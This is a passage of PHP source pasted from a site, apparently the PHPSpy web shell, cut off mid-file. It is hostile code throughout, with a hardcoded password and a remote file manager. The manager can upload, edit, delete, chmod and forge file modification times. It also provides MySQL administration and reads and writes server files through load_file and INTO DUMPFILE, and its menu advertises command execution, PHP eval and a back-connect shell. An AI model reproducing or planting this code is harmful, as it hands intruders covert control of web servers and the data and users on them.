· 10 years ago · May 10, 2016, 07:06 PM
1<?php
2error_reporting(7);
3@set_magic_quotes_runtime(0);
4ob_start();
5$mtime = explode(' ', microtime());
6$starttime = $mtime[1] + $mtime[0];
7define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
8define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
9define('IS_COM', class_exists('COM') ? 1 : 0 );
10define('IS_GPC', get_magic_quotes_gpc());
11$dis_func = get_cfg_var('disable_functions');
12define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
13@set_time_limit(0);
14
15foreach(array('_GET','_POST') as $_request) {
16 foreach($$_request as $_key => $_value) {
17 if ($_key{0} != '_') {
18 if (IS_GPC) {
19 $_value = s_array($_value);
20 }
21 $$_key = $_value;
22 }
23 }
24}
25
26$admin = array();
27$admin['check'] = true;
28$admin['pass'] = 'amo';
29$admin['cookiepre'] = '';
30$admin['cookiedomain'] = '';
31$admin['cookiepath'] = '/';
32$admin['cookielife'] = 86400;
33
34if ($charset == 'utf8') {
35 header("content-Type: text/html; charset=utf-8");
36} elseif ($charset == 'big5') {
37 header("content-Type: text/html; charset=big5");
38} elseif ($charset == 'gbk') {
39 header("content-Type: text/html; charset=gbk");
40} elseif ($charset == 'latin1') {
41 header("content-Type: text/html; charset=iso-8859-2");
42}
43
44$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
45$timestamp = time();
46
47if ($action == "logout") {
48 scookie('phpspypass', '', -86400 * 365);
49 p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
50 p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
51 exit;
52}
53if($admin['check']) {
54 if ($doing == 'login') {
55 if ($admin['pass'] == $password) {
56 scookie('phpspypass', $password);
57 p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
58 p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
59 exit;
60 }
61 }
62 if ($_COOKIE['phpspypass']) {
63 if ($_COOKIE['phpspypass'] != $admin['pass']) {
64 loginpage();
65 }
66 } else {
67 loginpage();
68 }
69}
70
71$errmsg = '';
72
73if ($action == 'phpinfo') {
74 if (IS_PHPINFO) {
75 phpinfo();
76 } else {
77 $errmsg = 'phpinfo() function has non-permissible';
78 }
79}
80
81if ($doing == 'downfile' && $thefile) {
82 if (!@file_exists($thefile)) {
83 $errmsg = 'The file you want Downloadable was nonexistent';
84 } else {
85 $fileinfo = pathinfo($thefile);
86 header('Content-type: application/x-'.$fileinfo['extension']);
87 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
88 header('Content-Length: '.filesize($thefile));
89 @readfile($thefile);
90 exit;
91 }
92}
93
94if ($doing == 'backupmysql' && !$saveasfile) {
95 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
96 $table = array_flip($table);
97 $result = q("SHOW tables");
98 if (!$result) p('<h2>'.mysql_error().'</h2>');
99 $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
100 header('Content-type: application/unknown');
101 header('Content-Disposition: attachment; filename='.$filename);
102 $mysqldata = '';
103 while ($currow = mysql_fetch_array($result)) {
104 if (isset($table[$currow[0]])) {
105 $mysqldata .= sqldumptable($currow[0]);
106 }
107 }
108 mysql_close();
109 exit;
110}
111
112if($doing=='mysqldown'){
113 if (!$dbname) {
114 $errmsg = 'Please input dbname';
115 } else {
116 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
117 if (!file_exists($mysqldlfile)) {
118 $errmsg = 'The file you want Downloadable was nonexistent';
119 } else {
120 $result = q("select load_file('$mysqldlfile');");
121 if(!$result){
122 q("DROP TABLE IF EXISTS tmp_angel;");
123 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
124 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
125 $result = q("select content from tmp_angel");
126 q("DROP TABLE tmp_angel");
127 }
128 $row = @mysql_fetch_array($result);
129 if (!$row) {
130 $errmsg = 'Load file failed '.mysql_error();
131 } else {
132 $fileinfo = pathinfo($mysqldlfile);
133 header('Content-type: application/x-'.$fileinfo['extension']);
134 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
135 header("Accept-Length: ".strlen($row[0]));
136 echo $row[0];
137 exit;
138 }
139 }
140 }
141}
142
143?>
144<html>
145<head>
146<meta http-equiv="Content-Type" content="text/html; charset=gbk">
147<title></title>
148<style type="text/css">
149body,td{font: 12px Arial,Tahoma;line-height: 16px;}
150.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
151.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
152.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
153a {color: #00f;text-decoration:underline;}
154a:hover{color: #f00;text-decoration:none;}
155.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
156.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
157.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
158.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
159.head td span{font-weight:normal;}
160form{margin:0;padding:0;}
161h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
162ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
163u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
164</style>
165<script type="text/javascript">
166function CheckAll(form) {
167 for(var i=0;i<form.elements.length;i++) {
168 var e = form.elements[i];
169 if (e.name != 'chkall')
170 e.checked = form.chkall.checked;
171 }
172}
173function $(id) {
174 return document.getElementById(id);
175}
176function goaction(act){
177 $('goaction').action.value=act;
178 $('goaction').submit();
179}
180</script>
181</head>
182<body style="margin:0;table-layout:fixed; word-break:break-all">
183<table width="100%" border="0" cellpadding="0" cellspacing="0">
184 <tr class="head">
185 <td><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
186 </tr>
187 <tr class="alt1">
188 <td><span style="float:right;">Safe Mode:<?php echo getcfg('safe_mode');?></span>
189 <a href="javascript:goaction('logout');">Logout</a> |
190 <a href="javascript:goaction('file');">File Manager</a> |
191 <a href="javascript:goaction('sqladmin');">MySQL Manager</a> |
192 <a href="javascript:goaction('sqlfile');">MySQL Upload & Download</a> |
193 <a href="javascript:goaction('shell');">Execute Command</a> |
194 <a href="javascript:goaction('phpenv');">PHP Variable</a> |
195 <a href="javascript:goaction('eval');">Eval PHP Code</a>
196 <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Back Connect</a><?php }?>
197 </td>
198 </tr>
199</table>
200<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
201<?php
202
203formhead(array('name'=>'goaction'));
204makehide('action');
205formfoot();
206
207$errmsg && m($errmsg);
208
209!$dir && $dir = '.';
210$nowpath = getPath(SA_ROOT, $dir);
211if (substr($dir, -1) != '/') {
212 $dir = $dir.'/';
213}
214$uedir = ue($dir);
215
216if (!$action || $action == 'file') {
217
218 $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
219
220 if ($doing == 'deldir' && $thefile) {
221 if (!file_exists($thefile)) {
222 m($thefile.' directory does not exist');
223 } else {
224 m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
225 }
226 }
227
228 elseif ($newdirname) {
229 $mkdirs = $nowpath.$newdirname;
230 if (file_exists($mkdirs)) {
231 m('Directory has already existed');
232 } else {
233 m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
234 @chmod($mkdirs,0777);
235 }
236 }
237
238 elseif ($doupfile) {
239 m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
240 }
241
242 elseif ($editfilename && $filecontent) {
243 $fp = @fopen($editfilename,'w');
244 m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
245 @fclose($fp);
246 }
247
248 elseif ($pfile && $newperm) {
249 if (!file_exists($pfile)) {
250 m('The original file does not exist');
251 } else {
252 $newperm = base_convert($newperm,8,10);
253 m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
254 }
255 }
256
257 elseif ($oldname && $newfilename) {
258 $nname = $nowpath.$newfilename;
259 if (file_exists($nname) || !file_exists($oldname)) {
260 m($nname.' has already existed or original file does not exist');
261 } else {
262 m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
263 }
264 }
265
266 elseif ($sname && $tofile) {
267 if (file_exists($tofile) || !file_exists($sname)) {
268 m('The goal file has already existed or original file does not exist');
269 } else {
270 m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
271 }
272 }
273
274 elseif ($curfile && $tarfile) {
275 if (!@file_exists($curfile) || !@file_exists($tarfile)) {
276 m('The goal file has already existed or original file does not exist');
277 } else {
278 $time = @filemtime($tarfile);
279 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
280 }
281 }
282
283 elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
284 if (!@file_exists($curfile)) {
285 m(basename($curfile).' does not exist');
286 } else {
287 $time = strtotime("$year-$month-$day $hour:$minute:$second");
288 m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
289 }
290 }
291
292 elseif($doing == 'downrar') {
293 if ($dl) {
294 $dfiles='';
295 foreach ($dl as $filepath => $value) {
296 $dfiles.=$filepath.',';
297 }
298 $dfiles=substr($dfiles,0,strlen($dfiles)-1);
299 $dl=explode(',',$dfiles);
300 $zip=new PHPZip($dl);
301 $code=$zip->out;
302 header('Content-type: application/octet-stream');
303 header('Accept-Ranges: bytes');
304 header('Accept-Length: '.strlen($code));
305 header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
306 echo $code;
307 exit;
308 } else {
309 m('Please select file(s)');
310 }
311 }
312
313 elseif($doing == 'delfiles') {
314 if ($dl) {
315 $dfiles='';
316 $succ = $fail = 0;
317 foreach ($dl as $filepath => $value) {
318 if (@unlink($filepath)) {
319 $succ++;
320 } else {
321 $fail++;
322 }
323 }
324 m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail);
325 } else {
326 m('Please select file(s)');
327 }
328 }
329
330 formhead(array('name'=>'createdir'));
331 makehide('newdirname');
332 makehide('dir',$nowpath);
333 formfoot();
334 formhead(array('name'=>'fileperm'));
335 makehide('newperm');
336 makehide('pfile');
337 makehide('dir',$nowpath);
338 formfoot();
339 formhead(array('name'=>'copyfile'));
340 makehide('sname');
341 makehide('tofile');
342 makehide('dir',$nowpath);
343 formfoot();
344 formhead(array('name'=>'rename'));
345 makehide('oldname');
346 makehide('newfilename');
347 makehide('dir',$nowpath);
348 formfoot();
349 formhead(array('name'=>'fileopform'));
350 makehide('action');
351 makehide('opfile');
352 makehide('dir');
353 formfoot();
354
355 $free = @disk_free_space($nowpath);
356 !$free && $free = 0;
357 $all = @disk_total_space($nowpath);
358 !$all && $all = 0;
359 $used = $all-$free;
360 $used_percent = @round(100/($all/$free),2);
361 p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
362
363?>
364<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
365 <form action="" method="post" id="godir" name="godir">
366 <tr>
367 <td nowrap>Current Directory (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
368 <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
369 <td nowrap><input class="bt" value="GO" type="submit"></td>
370 </tr>
371 </form>
372</table>
373<script type="text/javascript">
374function createdir(){
375 var newdirname;
376 newdirname = prompt('Please input the directory name:', '');
377 if (!newdirname) return;
378 $('createdir').newdirname.value=newdirname;
379 $('createdir').submit();
380}
381function fileperm(pfile){
382 var newperm;
383 newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
384 if (!newperm) return;
385 $('fileperm').newperm.value=newperm;
386 $('fileperm').pfile.value=pfile;
387 $('fileperm').submit();
388}
389function copyfile(sname){
390 var tofile;
391 tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
392 if (!tofile) return;
393 $('copyfile').tofile.value=tofile;
394 $('copyfile').sname.value=sname;
395 $('copyfile').submit();
396}
397function rename(oldname){
398 var newfilename;
399 newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
400 if (!newfilename) return;
401 $('rename').newfilename.value=newfilename;
402 $('rename').oldname.value=oldname;
403 $('rename').submit();
404}
405function dofile(doing,thefile,m){
406 if (m && !confirm(m)) {
407 return;
408 }
409 $('filelist').doing.value=doing;
410 if (thefile){
411 $('filelist').thefile.value=thefile;
412 }
413 $('filelist').submit();
414}
415function createfile(nowpath){
416 var filename;
417 filename = prompt('Please input the file name:', '');
418 if (!filename) return;
419 opfile('editfile',nowpath + filename,nowpath);
420}
421function opfile(action,opfile,dir){
422 $('fileopform').action.value=action;
423 $('fileopform').opfile.value=opfile;
424 $('fileopform').dir.value=dir;
425 $('fileopform').submit();
426}
427function godir(dir,view_writable){
428 if (view_writable) {
429 $('godir').view_writable.value=1;
430 }
431 $('godir').dir.value=dir;
432 $('godir').submit();
433}
434</script>
435 <?php
436 tbhead();
437 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
438 p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="bt" name="doupfile" value="Upload" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');
439 p('<a href="javascript:godir(\''.$_SERVER["DOCUMENT_ROOT"].'\');">WebRoot</a>');
440 if ($view_writable) {
441 p(' | <a href="javascript:godir(\''.$nowpath.'\');">View All</a>');
442 } else {
443 p(' | <a href="javascript:godir(\''.$nowpath.'\',\'1\');">View Writable</a>');
444 }
445 p(' | <a href="javascript:createdir();">Create Directory</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
446 if (IS_WIN && IS_COM) {
447 $obj = new COM('scripting.filesystemobject');
448 if ($obj && is_object($obj)) {
449 $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
450 foreach($obj->Drives as $drive) {
451 if ($drive->DriveType == 2) {
452 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).' Free:'.sizecount($drive->FreeSpace).' Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
453 } else {
454 p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
455 }
456 }
457 }
458 }
459
460 p('</td></tr></form>');
461
462 p('<tr class="head"><td> </td><td>Filename</td><td width="16%">Last modified</td><td width="10%">Size</td><td width="20%">Chmod / Perms</td><td width="22%">Action</td></tr>');
463
464 $dirdata=array();
465 $filedata=array();
466
467 if ($view_writable) {
468 $dirdata = GetList($nowpath);
469 } else {
470 $dirs=@opendir($dir);
471 while ($file=@readdir($dirs)) {
472 $filepath=$nowpath.$file;
473 if(@is_dir($filepath)){
474 $dirdb['filename']=$file;
475 $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
476 $dirdb['dirchmod']=getChmod($filepath);
477 $dirdb['dirperm']=getPerms($filepath);
478 $dirdb['fileowner']=getUser($filepath);
479 $dirdb['dirlink']=$nowpath;
480 $dirdb['server_link']=$filepath;
481 $dirdb['client_link']=ue($filepath);
482 $dirdata[]=$dirdb;
483 } else {
484 $filedb['filename']=$file;
485 $filedb['size']=sizecount(@filesize($filepath));
486 $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
487 $filedb['filechmod']=getChmod($filepath);
488 $filedb['fileperm']=getPerms($filepath);
489 $filedb['fileowner']=getUser($filepath);
490 $filedb['dirlink']=$nowpath;
491 $filedb['server_link']=$filepath;
492 $filedb['client_link']=ue($filepath);
493 $filedata[]=$filedb;
494 }
495 }
496 unset($dirdb);
497 unset($filedb);
498 @closedir($dirs);
499 }
500 @sort($dirdata);
501 @sort($filedata);
502 $dir_i = '0';
503 foreach($dirdata as $key => $dirdb){
504 if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
505 $thisbg = bg();
506 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
507 p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
508 p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
509 p('<td nowrap>'.$dirdb['mtime'].'</td>');
510 p('<td nowrap>--</td>');
511 p('<td nowrap>');
512 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
513 p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
514 p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\nIf non-empty directory, will be delete all the files.\')">Del</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
515 p('</tr>');
516 $dir_i++;
517 } else {
518 if($dirdb['filename']=='..') {
519 p('<tr class='.bg().'>');
520 p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Parent Directory</a></td>');
521 p('</tr>');
522 }
523 }
524 }
525
526 p('<tr bgcolor="#dddddd" stlye="border-top:1px solid #fff;border-bottom:1px solid #ddd;"><td colspan="6" height="5"></td></tr>');
527 p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
528 makehide('action','file');
529 makehide('thefile');
530 makehide('doing');
531 makehide('dir',$nowpath);
532 $file_i = '0';
533 foreach($filedata as $key => $filedb){
534 if($filedb['filename']!='..' && $filedb['filename']!='.') {
535 $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']);
536 $thisbg = bg();
537 p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
538 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
539 p('<td><a href="'.$fileurl.'" target="_blank">'.$filedb['filename'].'</a></td>');
540 p('<td nowrap>'.$filedb['mtime'].'</td>');
541 p('<td nowrap>'.$filedb['size'].'</td>');
542 p('<td nowrap>');
543 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
544 p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
545 p('<td nowrap>');
546 p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Down</a> | ');
547 p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">Copy</a> | ');
548 p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
549 p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
550 p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Time</a>');
551 p('</td></tr>');
552 $file_i++;
553 }
554 }
555 p('<tr class="'.bg().'"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packing download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">'.$dir_i.' directories / '.$file_i.' files</td></tr>');
556 p('</form></table>');
557}
558
559elseif ($action == 'sqlfile') {
560 if($doing=="mysqlupload"){
561 $file = $_FILES['uploadfile'];
562 $filename = $file['tmp_name'];
563 if (file_exists($savepath)) {
564 m('The goal file has already existed');
565 } else {
566 if(!$filename) {
567 m('Please choose a file');
568 } else {
569 $fp=@fopen($filename,'r');
570 $contents=@fread($fp, filesize($filename));
571 @fclose($fp);
572 $contents = bin2hex($contents);
573 if(!$upname) $upname = $file['name'];
574 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
575 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
576 m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
577 }
578 }
579 }
580?>
581<script type="text/javascript">
582function mysqlfile(doing){
583 if(!doing) return;
584 $('doing').value=doing;
585 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
586 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
587 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
588 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
589 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
590 $('mysqlfile').charset.value=$('dbinfo').charset.value;
591 $('mysqlfile').submit();
592}
593</script>
594<?php
595 !$dbhost && $dbhost = 'localhost';
596 !$dbuser && $dbuser = 'root';
597 !$dbport && $dbport = '3306';
598 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
599 formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
600 makehide('action','sqlfile');
601 p('<p>');
602 p('DBHost:');
603 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
604 p(':');
605 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
606 p('DBUser:');
607 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
608 p('DBPass:');
609 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
610 p('DBName:');
611 makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
612 p('DBCharset:');
613 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
614 p('</p>');
615 formfoot();
616 p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
617 p('<h2>Upload file</h2>');
618 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
619 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
620 p('<h2>Download file</h2>');
621 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
622 makehide('dbhost');
623 makehide('dbport');
624 makehide('dbuser');
625 makehide('dbpass');
626 makehide('dbname');
627 makehide('charset');
628 makehide('doing');
629 makehide('action','sqlfile');
630 p('</form>');
631}
632
633elseif ($action == 'sqladmin') {
634 !$dbhost && $dbhost = 'localhost';
635 !$dbuser && $dbuser = 'root';
636 !$dbport && $dbport = '3306';
637 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
638 if(isset($dbhost)){
639 $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
640 }
641 if(isset($dbuser)) {
642 $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
643 }
644 if(isset($dbpass)) {
645 $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
646 }
647 if(isset($dbport)) {
648 $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
649 }
650 if(isset($dbname)) {
651 $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
652 }
653 if(isset($charset)) {
654 $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
655 }
656
657 if ($doing == 'backupmysql' && $saveasfile) {
658 if (!$table) {
659 m('Please choose the table');
660 } else {
661 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
662 $table = array_flip($table);
663 $fp = @fopen($path,'w');
664 if ($fp) {
665 $result = q('SHOW tables');
666 if (!$result) p('<h2>'.mysql_error().'</h2>');
667 $mysqldata = '';
668 while ($currow = mysql_fetch_array($result)) {
669 if (isset($table[$currow[0]])) {
670 sqldumptable($currow[0], $fp);
671 }
672 }
673 fclose($fp);
674 $fileurl = str_replace(SA_ROOT,'',$path);
675 m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
676 mysql_close();
677 } else {
678 m('Backup failed');
679 }
680 }
681 }
682 if ($insert && $insertsql) {
683 $keystr = $valstr = $tmp = '';
684 foreach($insertsql as $key => $val) {
685 if ($val) {
686 $keystr .= $tmp.$key;
687 $valstr .= $tmp."'".addslashes($val)."'";
688 $tmp = ',';
689 }
690 }
691 if ($keystr && $valstr) {
692 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
693 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
694 }
695 }
696 if ($update && $insertsql && $base64) {
697 $valstr = $tmp = '';
698 foreach($insertsql as $key => $val) {
699 $valstr .= $tmp.$key."='".addslashes($val)."'";
700 $tmp = ',';
701 }
702 if ($valstr) {
703 $where = base64_decode($base64);
704 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
705 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
706 }
707 }
708 if ($doing == 'del' && $base64) {
709 $where = base64_decode($base64);
710 $delete_sql = "DELETE FROM $tablename WHERE $where";
711 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
712 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
713 }
714
715 if ($tablename && $doing == 'drop') {
716 dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
717 if (q("DROP TABLE $tablename")) {
718 m('Drop table of success');
719 $tablename = '';
720 } else {
721 m(mysql_error());
722 }
723 }
724
725 $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
726
727 formhead(array('title'=>'MYSQL Manager'));
728 makehide('action','sqladmin');
729 p('<p>');
730 p('DBHost:');
731 makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
732 p(':');
733 makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
734 p('DBUser:');
735 makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
736 p('DBPass:');
737 makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
738 p('DBCharset:');
739 makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
740 makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
741 p('</p>');
742 formfoot();
743?>
744<script type="text/javascript">
745function editrecord(action, base64, tablename){
746 if (action == 'del') {
747 if (!confirm('Is or isn\'t deletion record?')) return;
748 }
749 $('recordlist').doing.value=action;
750 $('recordlist').base64.value=base64;
751 $('recordlist').tablename.value=tablename;
752 $('recordlist').submit();
753}
754function moddbname(dbname) {
755 if(!dbname) return;
756 $('setdbname').dbname.value=dbname;
757 $('setdbname').submit();
758}
759function settable(tablename,doing,page) {
760 if(!tablename) return;
761 if (doing) {
762 $('settable').doing.value=doing;
763 }
764 if (page) {
765 $('settable').page.value=page;
766 }
767 $('settable').tablename.value=tablename;
768 $('settable').submit();
769}
770</script>
771<?php
772 formhead(array('name'=>'recordlist'));
773 makehide('doing');
774 makehide('action','sqladmin');
775 makehide('base64');
776 makehide('tablename');
777 p($dbform);
778 formfoot();
779
780 formhead(array('name'=>'setdbname'));
781 makehide('action','sqladmin');
782 p($dbform);
783 if (!$dbname) {
784 makehide('dbname');
785 }
786 formfoot();
787
788 formhead(array('name'=>'settable'));
789 makehide('action','sqladmin');
790 p($dbform);
791 makehide('tablename');
792 makehide('page',$page);
793 makehide('doing');
794 formfoot();
795
796 $cachetables = array();
797 $pagenum = 30;
798 $page = intval($page);
799 if($page) {
800 $start_limit = ($page - 1) * $pagenum;
801 } else {
802 $start_limit = 0;
803 $page = 1;
804 }
805 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
806 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
807 $mysqlver = mysql_get_server_info();
808 p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
809 $highver = $mysqlver > '4.1' ? 1 : 0;
810
811 $query = q("SHOW DATABASES");
812 $dbs = array();
813 $dbs[] = '-- Select a database --';
814 while($db = mysql_fetch_array($query)) {
815 $dbs[$db['Database']] = $db['Database'];
816 }
